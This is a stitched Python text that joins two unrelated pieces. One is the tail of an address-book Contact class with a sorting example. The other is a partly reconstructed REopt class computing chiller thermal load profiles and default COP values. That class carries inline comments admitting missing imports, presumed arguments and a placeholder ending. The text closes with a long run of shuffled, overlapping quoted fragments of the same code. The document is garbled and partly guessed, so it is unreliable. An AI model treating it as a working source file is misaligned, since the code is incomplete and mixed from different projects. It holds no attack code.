                 workphone=None, fax=None, email_1=None, email_2=None, email_3=None,
                 homepage=None, address_2=None, homephone2=None, notes=None,
                 all_emails_from_homepage=None, all_phones_from_homepage=None):
        self.firstname = firstname
        self.middlename = middlename
        self.lastname = lastname
        self.nickname = nickname
        self.title = title
        self.company = company
        self.address = address
        self.homephone = homephone
        self.mobilephone = mobilephone
        self.workphone = workphone
        self.fax = fax
        self.email_1 = email_1
        self.email_2 = email_2
        self.email_3 = email_3
        self.homepage = homepage
        self.address_2 = address_2
        self.homephone2 = homephone2
        self.notes = notes
        self.all_emails_from_homepage = all_emails_from_homepage
        self.all_phones_from_homepage = all_phones_from_homepage
        self.id = id

    def __repr__(self):
        return "%s:%s:%s" % (self.id, self.firstname, self.lastname)

    def __eq__(self, other):
        # Two contacts match when the ids agree (or either id is unknown)
        # and both name fields agree.
        return (self.id is None or other.id is None or self.id == other.id) \
               and self.lastname == other.lastname and self.firstname == other.firstname

    def id_or_max(self):
        # Sort-key helper: contacts without an id sort last.
        if self.id:
            return int(self.id)
        else:
            return maxsize
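The `__eq__` and `id_or_max` pair supports comparing and ordering contacts even when some records have no id yet: known ids are trusted, missing ids fall back to name matching and sort last. A short illustrative use (the sample contacts are made up):

contacts = [
    Contact(firstname='Ada', lastname='Lovelace', id='2'),
    Contact(firstname='Alan', lastname='Turing'),            # no id assigned yet
    Contact(firstname='Grace', lastname='Hopper', id='1'),
]
for contact in sorted(contacts, key=Contact.id_or_max):
    print(contact)  # 1:Grace:Hopper, then 2:Ada:Lovelace, then None:Alan:Turing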
# reo (REopt): LoadProfileChillerThermal; the source record is truncated mid-class,
# so the remaining gaps are marked inline below.
import os
import json
import pandas as pd
import numpy as np
from datetime import datetime
from reo.utilities import TONHOUR_TO_KWHT
# BuiltInProfile is used below; its import statement is not visible in the source.


class LoadProfileChillerThermal(BuiltInProfile):
    """
    Chiller Load Profiles based on CRB defined load shapes or user-defined input
    """
    with open(os.path.join(BuiltInProfile.library_path, 'reference_cooling_kwh.json'), 'r') as f:
        annual_loads = json.loads(f.read())

    builtin_profile_prefix = "Cooling8760_norm_"
    electric_chiller_cop_defaults = {"convert_elec_to_thermal": 4.55,
                                     "less_than_100_tons": 4.40,
                                     "greater_than_100_tons": 4.69}

    @staticmethod
    def get_default_cop(max_thermal_factor_on_peak_load, max_kw=None, max_kwt=None, max_ton=None):
        if max_ton is not None:
            max_cooling_load_tons = max_ton
        elif max_kwt is not None:
            max_cooling_load_tons = max_kwt / TONHOUR_TO_KWHT
        elif max_kw is not None:
            max_cooling_load_tons = max_kw / TONHOUR_TO_KWHT * \
                LoadProfileChillerThermal.electric_chiller_cop_defaults["convert_elec_to_thermal"]
        else:
            raise Exception("Please supply a max_ton, max_kwt or max_kw value")
        estimated_max_chiller_thermal_capacity_tons = max_cooling_load_tons * max_thermal_factor_on_peak_load
        if estimated_max_chiller_thermal_capacity_tons < 100.0:
            return LoadProfileChillerThermal.electric_chiller_cop_defaults["less_than_100_tons"]
        else:
            return LoadProfileChillerThermal.electric_chiller_cop_defaults["greater_than_100_tons"]

    def __init__(self, dfm=None, total_electric_load_list=[], latitude=None, longitude=None,
                 nearest_city=None, time_steps_per_hour=None, year=None, chiller_cop=None,
                 max_thermal_factor_on_peak_load=None, **kwargs):
        """
        :param dfm: (object) data_manager to which this load object will be added
        :param total_electric_load_list: (array) electric LoadProfile [...] parsed inputs
        :param latitude: (float) site latitude
        :param longitude: (float) site longitude
        :param nearest_city: (str) site nearest_city
        :param time_steps_per_hour: (int) simulation time resolution
        :param year: (int) electric LoadProfile year
        :param chiller_cop: (float or int) Coefficient of Performance of the Chiller
        :param max_thermal_factor_on_peak_load: (float or int) maximum thermal factor on peak load for the Chiller
        :param kwargs: (dict) Chiller specific inputs as defined in reo/nested_inputs
        """
        self.nearest_city = nearest_city
        self.latitude = latitude
        self.longitude = longitude
        self.time_steps_per_hour = time_steps_per_hour
        self.year = year

        # Default electric_load_list to None, used later to see if we need to convert kWh to kWht
        electric_load_list = None

        # Use highest resolution/quality input first
        if kwargs.get('loads_ton') is not None:
            self.load_list = [i * TONHOUR_TO_KWHT for i in kwargs['loads_ton']]

        # DOE Reference building profiles are used if there is a reference name provided
        elif kwargs.get('doe_reference_name'):
            doe_reference_name = kwargs.get('doe_reference_name') or []
            combine_loadlist = []
            for i in range(len(doe_reference_name)):
                # Monthly loads can only be used to scale a non-hybrid profile
                kwargs['monthly_totals_energy'] = kwargs.get("monthly_tonhour")
                if len(doe_reference_name) > 1:
                    kwargs['monthly_totals_energy'] = None
                kwargs['annual_energy'] = None
                # Annual loads are used in place of percent shares if provided
                if kwargs.get("annual_tonhour") is not None:
                    kwargs['annual_energy'] = kwargs["annual_tonhour"]
                kwargs['annual_loads'] = self.annual_loads
                kwargs['builtin_profile_prefix'] = self.builtin_profile_prefix
                kwargs['latitude'] = latitude
                kwargs['longitude'] = longitude
                kwargs['doe_reference_name'] = doe_reference_name[i]
                kwargs['nearest_city'] = nearest_city
                kwargs['time_steps_per_hour'] = time_steps_per_hour
                kwargs['year'] = year
                super(LoadProfileChillerThermal, self).__init__(**kwargs)
                if time_steps_per_hour > 1:
                    partial_load_list = np.concatenate([[x] * time_steps_per_hour
                                                        for x in self.built_in_profile])
                else:
                    partial_load_list = self.built_in_profile
                combine_loadlist.append(list(partial_load_list))

            # In the case where the user supplies a list of doe_reference_names and percent shares,
            # for consistency we want to act as if we had scaled the partial load to the total site
            # load, which was unknown at the start of the loop above. This scalar makes it such that
            # when the percent shares are later applied, the total site load will be the sum
            # of the default annual loads for this location.
            if (len(doe_reference_name) > 1) and kwargs['annual_energy'] is None:
                total_site_load = sum([sum(l) for l in combine_loadlist])
                for i, load in enumerate(combine_loadlist):
                    actual_percent_of_site_load = sum(load) / total_site_load
                    scalar = 1.0 / actual_percent_of_site_load
                    combine_loadlist[i] = list(np.array(load) * scalar)

            # Apply the percent share of annual load to each partial load
            if len(doe_reference_name) > 1:
                for i, load in enumerate(combine_loadlist):
                    combine_loadlist[i] = list(np.array(load) * (kwargs.get("percent_share")[i] / 100.0))

            # Aggregate total hybrid load
            hybrid_loadlist = list(np.sum(np.array(combine_loadlist), 0))
            if (kwargs.get("annual_tonhour") is not None) or (kwargs.get("monthly_tonhour") is not None):
                # load_list is always expected to be in units of kWth
                self.load_list = [i * TONHOUR_TO_KWHT for i in hybrid_loadlist]
            else:
                electric_load_list = hybrid_loadlist

        # If no doe_reference_name or loads_ton provided, scale by a fraction of electric load
        elif kwargs.get('loads_fraction') is not None:
            electric_load_list = list(np.array(kwargs['loads_fraction']) * np.array(total_electric_load_list))
        elif kwargs.get('monthly_fraction') is not None:
            month_series = pd.date_range(datetime(year, 1, 1), datetime(year + 1, 1, 1),
                                         periods=8760 * time_steps_per_hour)
            electric_load_list = [total_electric_load_list[i] * kwargs['monthly_fraction'][month - 1]
                                  for i, month in enumerate(month_series.month)]
        elif kwargs.get('annual_fraction') is not None:
            electric_load_list = [kwargs['annual_fraction'] * kw for kw in total_electric_load_list]

        # Calculate COP based on kWth load or kW load (if not user-entered)
        self.chiller_cop = chiller_cop
        # Update COP based on estimated max chiller load
        if self.chiller_cop is None:
            if electric_load_list is not None:
                # This is a static method so it can be accessible in views.py.
                # (This branch is partially cut off in the source; by symmetry with the
                #  branch below, it presumably passes max_kw=max(electric_load_list).)
                self.chiller_cop = LoadProfileChillerThermal.get_default_cop(
                    max_kw=max(electric_load_list),
                    max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load)
            else:
                # This is a static method so it can be accessible in views.py
                self.chiller_cop = LoadProfileChillerThermal.get_default_cop(
                    max_kwt=max(self.load_list),
                    max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load)

        # load_list is always expected to be in units of kWth
        if electric_load_list is not None:
            self.load_list = [i * self.chiller_cop for i in electric_load_list]
        self.annual_kwht = int(round(sum(self.load_list), 0))
        if dfm is not None:
            ...  # the source is cut off at "if dfm is not"; presumably the load
                 # registers itself with the data_manager here
"\"\"\" self.nearest_city = nearest_city self.latitude = latitude self.longitude = longitude self.time_steps_per_hour = time_steps_per_hour",
"import BuiltInProfile import os import json import pandas as pd import numpy as",
"for kw in total_electric_load_list] #Calculate COP based on kwth load or kw load",
"* time_steps_per_hour \\ for x in self.built_in_profile]) else: partial_load_list = self.built_in_profile combine_loadlist.append(list(partial_load_list)) #",
"the user supplies a list of doe_reference_names and percent shares # for consistency",
"# load which was unknown at the start of the loop above. This",
"hybrid_loadlist = list(np.sum(np.array(combine_loadlist), 0)) if (kwargs.get(\"annual_tonhour\") is not None) or (kwargs.get(\"monthly_tonhour\") is not",
"def get_default_cop(max_thermal_factor_on_peak_load, max_kw=None, max_kwt=None, max_ton=None): if max_ton is not None: max_cooling_load_tons = max_ton",
"latitude kwargs['longitude'] = longitude kwargs['doe_reference_name'] = doe_reference_name[i] kwargs['nearest_city'] = nearest_city kwargs['time_steps_per_hour'] = time_steps_per_hour",
"of Performance for Chiller :param max_thermal_factor_on_peak_load: (float or int) maximum thermal factor on",
"estimated_max_chiller_thermal_capacity_tons = max_cooling_load_tons * max_thermal_factor_on_peak_load if estimated_max_chiller_thermal_capacity_tons < 100.0: return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"less_than_100_tons\"] else: return",
"want to act as if we had scaled the partial load to the",
"> 1: partial_load_list = np.concatenate([[x] * time_steps_per_hour \\ for x in self.built_in_profile]) else:",
"scale a non-hybrid profile kwargs['monthly_totals_energy'] = kwargs.get(\"monthly_tonhour\") if len(doe_reference_name)>1: kwargs['monthly_totals_energy'] = None kwargs['annual_energy']",
"kwargs['longitude'] = longitude kwargs['doe_reference_name'] = doe_reference_name[i] kwargs['nearest_city'] = nearest_city kwargs['time_steps_per_hour'] = time_steps_per_hour kwargs['year']",
"can be accessible in views.py self.chiller_cop = LoadProfileChillerThermal.get_default_cop( max_kw=max(electric_load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) else: #This is",
"= 1.0 / actual_percent_of_site_load combine_loadlist[i] = list(np.array(load)* scalar) #Apply the percent share of",
"load or kw load (if not user-entered) self.chiller_cop = chiller_cop # Update COP",
"will be the sum # of the default annual loads for this location",
"\"greater_than_100_tons\": 4.69} @staticmethod def get_default_cop(max_thermal_factor_on_peak_load, max_kw=None, max_kwt=None, max_ton=None): if max_ton is not None:",
"(int) simulation time resolution :param year: (int) electric LoadProfile year :param chiller_cop: (float",
"the percent shares are later applied that the total site load will be",
"units of kWth if electric_load_list is not None: self.load_list = [i*self.chiller_cop for i",
"[i*TONHOUR_TO_KWHT for i in kwargs['loads_ton']] # DOE Reference building profile are used if",
"of annual load to each partial load if (len(doe_reference_name) > 1): for i,",
"units of kWt self.load_list = [i*TONHOUR_TO_KWHT for i in hybrid_loadlist] else: electric_load_list =",
"time_steps_per_hour \\ for x in self.built_in_profile]) else: partial_load_list = self.built_in_profile combine_loadlist.append(list(partial_load_list)) # In",
"a static method so it can be accessible in views.py self.chiller_cop = LoadProfileChillerThermal.get_default_cop(",
"from reo.utilities import TONHOUR_TO_KWHT class LoadProfileChillerThermal(BuiltInProfile): \"\"\" Chiller Load Profiles based on CRB",
"LoadProfileChillerThermal.get_default_cop( max_kw=max(electric_load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) else: #This is a static method so it can be",
"object resulting from parsed inputs :param latitude: (float) site latitude :param longitude: (float)",
"1): for i, load in enumerate(combine_loadlist): combine_loadlist[i] = list(np.array(load) * (kwargs.get(\"percent_share\")[i]/100.0)) # Aggregate",
"self.nearest_city = nearest_city self.latitude = latitude self.longitude = longitude self.time_steps_per_hour = time_steps_per_hour self.year",
"list(np.array(load)* scalar) #Apply the percent share of annual load to each partial load",
"expected to be in units of kWt self.load_list = [i*TONHOUR_TO_KWHT for i in",
"used in place of percent shares if provided if kwargs.get(\"annual_tonhour\") is not None:",
"for Chiller :param max_thermal_factor_on_peak_load: (float or int) maximum thermal factor on peak load",
"else: #This is a static method so it can be accessible in views.py",
"actual_percent_of_site_load combine_loadlist[i] = list(np.array(load)* scalar) #Apply the percent share of annual load to",
"json import pandas as pd import numpy as np from datetime import datetime",
"= [i*TONHOUR_TO_KWHT for i in kwargs['loads_ton']] # DOE Reference building profile are used",
"return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"greater_than_100_tons\"] def __init__(self, dfm=None, total_electric_load_list=[], latitude=None, longitude=None, nearest_city=None, time_steps_per_hour=None, year=None, chiller_cop=None, max_thermal_factor_on_peak_load=None,",
"In the case where the user supplies a list of doe_reference_names and percent",
"actual_percent_of_site_load = sum(load)/total_site_load scalar = 1.0 / actual_percent_of_site_load combine_loadlist[i] = list(np.array(load)* scalar) #Apply",
"enumerate(combine_loadlist): combine_loadlist[i] = list(np.array(load) * (kwargs.get(\"percent_share\")[i]/100.0)) # Aggregate total hybrid load hybrid_loadlist =",
"accessible in views.py self.chiller_cop = LoadProfileChillerThermal.get_default_cop( max_kwt=max(self.load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) # load_list is always expected",
"total_electric_load_list=[], latitude=None, longitude=None, nearest_city=None, time_steps_per_hour=None, year=None, chiller_cop=None, max_thermal_factor_on_peak_load=None, **kwargs): \"\"\" :param dfm: (object)",
"partial load to the total site # load which was unknown at the",
"annual loads for this location if (len(doe_reference_name) > 1) and kwargs['annual_energy'] is None:",
"in place of percent shares if provided if kwargs.get(\"annual_tonhour\") is not None: kwargs['annual_energy']",
"for the Chiller :param kwargs: (dict) Chiller specific inputs as defined in reo/nested_inputs",
"if len(doe_reference_name)>1: kwargs['monthly_totals_energy'] = None kwargs['annual_energy'] = None # Annual loads are used",
"max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) # load_list is always expected to be in units of kWth if",
"nearest_city: (str) site nearest_city :param time_steps_per_hour: (int) simulation time resolution :param year: (int)",
"load for the Chiller :param kwargs: (dict) Chiller specific inputs as defined in",
"# Default electric_load_list to None, used later to see if we need to",
"when the percent shares are later applied that the total site load will",
"return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"less_than_100_tons\"] else: return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"greater_than_100_tons\"] def __init__(self, dfm=None, total_electric_load_list=[], latitude=None, longitude=None, nearest_city=None, time_steps_per_hour=None,",
"import numpy as np from datetime import datetime from reo.utilities import TONHOUR_TO_KWHT class",
"chiller_cop # Update COP based on estimated max chiller load if self.chiller_cop is",
"= kwargs.get('doe_reference_name') or [] combine_loadlist = [] for i in range(len(doe_reference_name)): # Monthly",
"year :param chiller_cop: (float or int) Coefficient of Performance for Chiller :param max_thermal_factor_on_peak_load:",
"electric_chiller_cop_defaults = { \"convert_elec_to_thermal\": 4.55, \"less_than_100_tons\": 4.40, \"greater_than_100_tons\": 4.69} @staticmethod def get_default_cop(max_thermal_factor_on_peak_load, max_kw=None,",
"None # Use highest resultion/quality input first if kwargs.get('loads_ton') is not None: self.load_list",
"else: partial_load_list = self.built_in_profile combine_loadlist.append(list(partial_load_list)) # In the case where the user supplies",
"electric load elif kwargs.get('loads_fraction') is not None: electric_load_list = list(np.array(kwargs['loads_fraction']) * np.array(total_electric_load_list)) elif",
"doe_reference_name = kwargs.get('doe_reference_name') or [] combine_loadlist = [] for i in range(len(doe_reference_name)): #",
"the total site load will be the sum # of the default annual",
"in views.py self.chiller_cop = LoadProfileChillerThermal.get_default_cop( max_kw=max(electric_load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) else: #This is a static method",
"max_thermal_factor_on_peak_load: (float or int) maximum thermal factor on peak load for the Chiller",
"max_ton is not None: max_cooling_load_tons = max_ton elif max_kwt is not None: max_cooling_load_tons",
"at the start of the loop above. This scalar makes it such that",
"import os import json import pandas as pd import numpy as np from",
"= sum(load)/total_site_load scalar = 1.0 / actual_percent_of_site_load combine_loadlist[i] = list(np.array(load)* scalar) #Apply the",
"to be in units of kWt self.load_list = [i*TONHOUR_TO_KWHT for i in hybrid_loadlist]",
"\"Cooling8760_norm_\" electric_chiller_cop_defaults = { \"convert_elec_to_thermal\": 4.55, \"less_than_100_tons\": 4.40, \"greater_than_100_tons\": 4.69} @staticmethod def get_default_cop(max_thermal_factor_on_peak_load,",
"electric LoadProfile object resulting from parsed inputs :param latitude: (float) site latitude :param",
"was unknown at the start of the loop above. This scalar makes it",
"(len(doe_reference_name) > 1): for i, load in enumerate(combine_loadlist): combine_loadlist[i] = list(np.array(load) * (kwargs.get(\"percent_share\")[i]/100.0))",
"< 100.0: return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"less_than_100_tons\"] else: return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"greater_than_100_tons\"] def __init__(self, dfm=None, total_electric_load_list=[], latitude=None, longitude=None,",
"<reponame>akuam1/REopt_Lite_API<gh_stars>0 from reo.src.load_profile import BuiltInProfile import os import json import pandas as pd",
"= { \"convert_elec_to_thermal\": 4.55, \"less_than_100_tons\": 4.40, \"greater_than_100_tons\": 4.69} @staticmethod def get_default_cop(max_thermal_factor_on_peak_load, max_kw=None, max_kwt=None,",
"os import json import pandas as pd import numpy as np from datetime",
"None: #This is a static method so it can be accessible in views.py",
"to see if we need to covert kWh to kWht electric_load_list = None",
"= [kwargs['annual_fraction'] * kw for kw in total_electric_load_list] #Calculate COP based on kwth",
"list(np.array(kwargs['loads_fraction']) * np.array(total_electric_load_list)) elif kwargs.get('monthly_fraction') is not None: month_series = pd.date_range(datetime(year,1,1), datetime(year+1,1,1), periods=8760*time_steps_per_hour)",
"to kWht electric_load_list = None # Use highest resultion/quality input first if kwargs.get('loads_ton')",
"reo/nested_inputs \"\"\" self.nearest_city = nearest_city self.latitude = latitude self.longitude = longitude self.time_steps_per_hour =",
"on estimated max chiller load if self.chiller_cop is None: if electric_load_list is not",
"LoadProfileChillerThermal.electric_chiller_cop_defaults[\"less_than_100_tons\"] else: return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"greater_than_100_tons\"] def __init__(self, dfm=None, total_electric_load_list=[], latitude=None, longitude=None, nearest_city=None, time_steps_per_hour=None, year=None,",
"None: max_cooling_load_tons = max_kw / TONHOUR_TO_KWHT * \\ LoadProfileChillerThermal.electric_chiller_cop_defaults[\"convert_elec_to_thermal\"] else: raise Exception(\"Please supply",
"load object will be added :param total_electric_load_list: (array) electric LoadProfile object resulting from",
"to covert kWh to kWht electric_load_list = None # Use highest resultion/quality input",
"annual load to each partial load if (len(doe_reference_name) > 1): for i, load",
"time_steps_per_hour self.year = year # Default electric_load_list to None, used later to see",
"(kwargs.get(\"percent_share\")[i]/100.0)) # Aggregate total hybrid load hybrid_loadlist = list(np.sum(np.array(combine_loadlist), 0)) if (kwargs.get(\"annual_tonhour\") is",
"nearest_city kwargs['time_steps_per_hour'] = time_steps_per_hour kwargs['year'] = year super(LoadProfileChillerThermal, self).__init__(**kwargs) if time_steps_per_hour > 1:",
"input \"\"\" with open(os.path.join(BuiltInProfile.library_path, 'reference_cooling_kwh.json'), 'r') as f: annual_loads = json.loads(f.read()) builtin_profile_prefix =",
"are later applied that the total site load will be the sum #",
"of electric load elif kwargs.get('loads_fraction') is not None: electric_load_list = list(np.array(kwargs['loads_fraction']) * np.array(total_electric_load_list))",
"or [] combine_loadlist = [] for i in range(len(doe_reference_name)): # Monthly loads can",
"If no doe_reference_name or loads_ton provided, scale by a fraction of electric load",
"kwargs['loads_ton']] # DOE Reference building profile are used if there is a reference",
"DOE Reference building profile are used if there is a reference name provided",
"# In the case where the user supplies a list of doe_reference_names and",
"or loads_ton provided, scale by a fraction of electric load elif kwargs.get('loads_fraction') is",
"self.chiller_cop = LoadProfileChillerThermal.get_default_cop( max_kwt=max(self.load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) # load_list is always expected to be in",
"import pandas as pd import numpy as np from datetime import datetime from",
"be in units of kWt self.load_list = [i*TONHOUR_TO_KWHT for i in hybrid_loadlist] else:",
"4.69} @staticmethod def get_default_cop(max_thermal_factor_on_peak_load, max_kw=None, max_kwt=None, max_ton=None): if max_ton is not None: max_cooling_load_tons",
"kwargs.get(\"monthly_tonhour\") if len(doe_reference_name)>1: kwargs['monthly_totals_energy'] = None kwargs['annual_energy'] = None # Annual loads are",
"of doe_reference_names and percent shares # for consistency we want to act as",
"Chiller :param kwargs: (dict) Chiller specific inputs as defined in reo/nested_inputs \"\"\" self.nearest_city",
"resolution :param year: (int) electric LoadProfile year :param chiller_cop: (float or int) Coefficient",
"expected to be in units of kWth if electric_load_list is not None: self.load_list",
"combine_loadlist[i] = list(np.array(load)* scalar) #Apply the percent share of annual load to each",
"max_ton=None): if max_ton is not None: max_cooling_load_tons = max_ton elif max_kwt is not",
"Annual loads are used in place of percent shares if provided if kwargs.get(\"annual_tonhour\")",
"Default electric_load_list to None, used later to see if we need to covert",
"added :param total_electric_load_list: (array) electric LoadProfile object resulting from parsed inputs :param latitude:",
"thermal factor on peak load for the Chiller :param kwargs: (dict) Chiller specific",
":param latitude: (float) site latitude :param longitude: (float) site longitude :param nearest_city: (str)",
"the Chiller :param kwargs: (dict) Chiller specific inputs as defined in reo/nested_inputs \"\"\"",
"def __init__(self, dfm=None, total_electric_load_list=[], latitude=None, longitude=None, nearest_city=None, time_steps_per_hour=None, year=None, chiller_cop=None, max_thermal_factor_on_peak_load=None, **kwargs): \"\"\"",
"of kWt self.load_list = [i*TONHOUR_TO_KWHT for i in hybrid_loadlist] else: electric_load_list = hybrid_loadlist",
"as f: annual_loads = json.loads(f.read()) builtin_profile_prefix = \"Cooling8760_norm_\" electric_chiller_cop_defaults = { \"convert_elec_to_thermal\": 4.55,",
"\\ for x in self.built_in_profile]) else: partial_load_list = self.built_in_profile combine_loadlist.append(list(partial_load_list)) # In the",
"or (kwargs.get(\"monthly_tonhour\") is not None): #load_list is always expected to be in units",
":param time_steps_per_hour: (int) simulation time resolution :param year: (int) electric LoadProfile year :param",
"we need to covert kWh to kWht electric_load_list = None # Use highest",
"(kwargs.get(\"monthly_tonhour\") is not None): #load_list is always expected to be in units of",
":param nearest_city: (str) site nearest_city :param time_steps_per_hour: (int) simulation time resolution :param year:",
"# when the percent shares are later applied that the total site load",
"not user-entered) self.chiller_cop = chiller_cop # Update COP based on estimated max chiller",
"= nearest_city self.latitude = latitude self.longitude = longitude self.time_steps_per_hour = time_steps_per_hour self.year =",
"LoadProfile year :param chiller_cop: (float or int) Coefficient of Performance for Chiller :param",
"Update COP based on estimated max chiller load if self.chiller_cop is None: if",
"= kwargs[\"annual_tonhour\"] kwargs['annual_loads'] = self.annual_loads kwargs['builtin_profile_prefix'] = self.builtin_profile_prefix kwargs['latitude'] = latitude kwargs['longitude'] =",
"Exception(\"Please supply a max_ton, max_kwt or max_kw value\") estimated_max_chiller_thermal_capacity_tons = max_cooling_load_tons * max_thermal_factor_on_peak_load",
"estimated_max_chiller_thermal_capacity_tons < 100.0: return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"less_than_100_tons\"] else: return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"greater_than_100_tons\"] def __init__(self, dfm=None, total_electric_load_list=[], latitude=None,",
"if kwargs.get(\"annual_tonhour\") is not None: kwargs['annual_energy'] = kwargs[\"annual_tonhour\"] kwargs['annual_loads'] = self.annual_loads kwargs['builtin_profile_prefix'] =",
"max_thermal_factor_on_peak_load if estimated_max_chiller_thermal_capacity_tons < 100.0: return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"less_than_100_tons\"] else: return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"greater_than_100_tons\"] def __init__(self, dfm=None,",
"name provided elif kwargs.get('doe_reference_name'): doe_reference_name = kwargs.get('doe_reference_name') or [] combine_loadlist = [] for",
"(str) site nearest_city :param time_steps_per_hour: (int) simulation time resolution :param year: (int) electric",
"is not None: self.load_list = [i*TONHOUR_TO_KWHT for i in kwargs['loads_ton']] # DOE Reference",
"kWt self.load_list = [i*TONHOUR_TO_KWHT for i in hybrid_loadlist] else: electric_load_list = hybrid_loadlist #",
"None: self.load_list = [i*self.chiller_cop for i in electric_load_list] self.annual_kwht = int(round(sum(self.load_list),0)) if dfm",
"= hybrid_loadlist # If no doe_reference_name or loads_ton provided, scale by a fraction",
"electric_load_list = None # Use highest resultion/quality input first if kwargs.get('loads_ton') is not",
"= list(np.array(kwargs['loads_fraction']) * np.array(total_electric_load_list)) elif kwargs.get('monthly_fraction') is not None: month_series = pd.date_range(datetime(year,1,1), datetime(year+1,1,1),",
"Monthly loads can only be used to scale a non-hybrid profile kwargs['monthly_totals_energy'] =",
"only be used to scale a non-hybrid profile kwargs['monthly_totals_energy'] = kwargs.get(\"monthly_tonhour\") if len(doe_reference_name)>1:",
"factor on peak load for the Chiller :param kwargs: (dict) Chiller specific inputs",
"so it can be accessible in views.py self.chiller_cop = LoadProfileChillerThermal.get_default_cop( max_kwt=max(self.load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) #",
"load which was unknown at the start of the loop above. This scalar",
"= None # Annual loads are used in place of percent shares if",
"None, used later to see if we need to covert kWh to kWht",
"self.year = year # Default electric_load_list to None, used later to see if",
"is not None: max_cooling_load_tons = max_ton elif max_kwt is not None: max_cooling_load_tons =",
"from parsed inputs :param latitude: (float) site latitude :param longitude: (float) site longitude",
"4.55, \"less_than_100_tons\": 4.40, \"greater_than_100_tons\": 4.69} @staticmethod def get_default_cop(max_thermal_factor_on_peak_load, max_kw=None, max_kwt=None, max_ton=None): if max_ton",
"#Apply the percent share of annual load to each partial load if (len(doe_reference_name)",
"kwargs['doe_reference_name'] = doe_reference_name[i] kwargs['nearest_city'] = nearest_city kwargs['time_steps_per_hour'] = time_steps_per_hour kwargs['year'] = year super(LoadProfileChillerThermal,",
"TONHOUR_TO_KWHT class LoadProfileChillerThermal(BuiltInProfile): \"\"\" Chiller Load Profiles based on CRB defined load shapes",
"object will be added :param total_electric_load_list: (array) electric LoadProfile object resulting from parsed",
"None: kwargs['annual_energy'] = kwargs[\"annual_tonhour\"] kwargs['annual_loads'] = self.annual_loads kwargs['builtin_profile_prefix'] = self.builtin_profile_prefix kwargs['latitude'] = latitude",
"time_steps_per_hour kwargs['year'] = year super(LoadProfileChillerThermal, self).__init__(**kwargs) if time_steps_per_hour > 1: partial_load_list = np.concatenate([[x]",
"x in self.built_in_profile]) else: partial_load_list = self.built_in_profile combine_loadlist.append(list(partial_load_list)) # In the case where",
"list of doe_reference_names and percent shares # for consistency we want to act",
"= max_cooling_load_tons * max_thermal_factor_on_peak_load if estimated_max_chiller_thermal_capacity_tons < 100.0: return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"less_than_100_tons\"] else: return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"greater_than_100_tons\"]",
"not None: #This is a static method so it can be accessible in",
"defined load shapes or user-defined input \"\"\" with open(os.path.join(BuiltInProfile.library_path, 'reference_cooling_kwh.json'), 'r') as f:",
"max_kw is not None: max_cooling_load_tons = max_kw / TONHOUR_TO_KWHT * \\ LoadProfileChillerThermal.electric_chiller_cop_defaults[\"convert_elec_to_thermal\"] else:",
"max chiller load if self.chiller_cop is None: if electric_load_list is not None: #This",
"for consistency we want to act as if we had scaled the partial",
"self.builtin_profile_prefix kwargs['latitude'] = latitude kwargs['longitude'] = longitude kwargs['doe_reference_name'] = doe_reference_name[i] kwargs['nearest_city'] = nearest_city",
"if electric_load_list is not None: #This is a static method so it can",
"LoadProfileChillerThermal.electric_chiller_cop_defaults[\"convert_elec_to_thermal\"] else: raise Exception(\"Please supply a max_ton, max_kwt or max_kw value\") estimated_max_chiller_thermal_capacity_tons =",
"max_ton, max_kwt or max_kw value\") estimated_max_chiller_thermal_capacity_tons = max_cooling_load_tons * max_thermal_factor_on_peak_load if estimated_max_chiller_thermal_capacity_tons <",
"elif max_kw is not None: max_cooling_load_tons = max_kw / TONHOUR_TO_KWHT * \\ LoadProfileChillerThermal.electric_chiller_cop_defaults[\"convert_elec_to_thermal\"]",
"#Calculate COP based on kwth load or kw load (if not user-entered) self.chiller_cop",
"Performance for Chiller :param max_thermal_factor_on_peak_load: (float or int) maximum thermal factor on peak",
"> 1): for i, load in enumerate(combine_loadlist): combine_loadlist[i] = list(np.array(load) * (kwargs.get(\"percent_share\")[i]/100.0)) #",
"peak load for the Chiller :param kwargs: (dict) Chiller specific inputs as defined",
"max_kw value\") estimated_max_chiller_thermal_capacity_tons = max_cooling_load_tons * max_thermal_factor_on_peak_load if estimated_max_chiller_thermal_capacity_tons < 100.0: return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"less_than_100_tons\"]",
"max_kw=max(electric_load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) else: #This is a static method so it can be accessible",
"#This is a static method so it can be accessible in views.py self.chiller_cop",
"self.annual_loads kwargs['builtin_profile_prefix'] = self.builtin_profile_prefix kwargs['latitude'] = latitude kwargs['longitude'] = longitude kwargs['doe_reference_name'] = doe_reference_name[i]",
"COP based on estimated max chiller load if self.chiller_cop is None: if electric_load_list",
"int) Coefficient of Performance for Chiller :param max_thermal_factor_on_peak_load: (float or int) maximum thermal",
"= chiller_cop # Update COP based on estimated max chiller load if self.chiller_cop",
"total site # load which was unknown at the start of the loop",
"@staticmethod def get_default_cop(max_thermal_factor_on_peak_load, max_kw=None, max_kwt=None, max_ton=None): if max_ton is not None: max_cooling_load_tons =",
"Aggregate total hybrid load hybrid_loadlist = list(np.sum(np.array(combine_loadlist), 0)) if (kwargs.get(\"annual_tonhour\") is not None)",
"# Use highest resultion/quality input first if kwargs.get('loads_ton') is not None: self.load_list =",
"= [total_electric_load_list[i] * kwargs['monthly_fraction'][month-1] \\ for i, month in enumerate(month_series.month)] elif kwargs.get('annual_fraction') is",
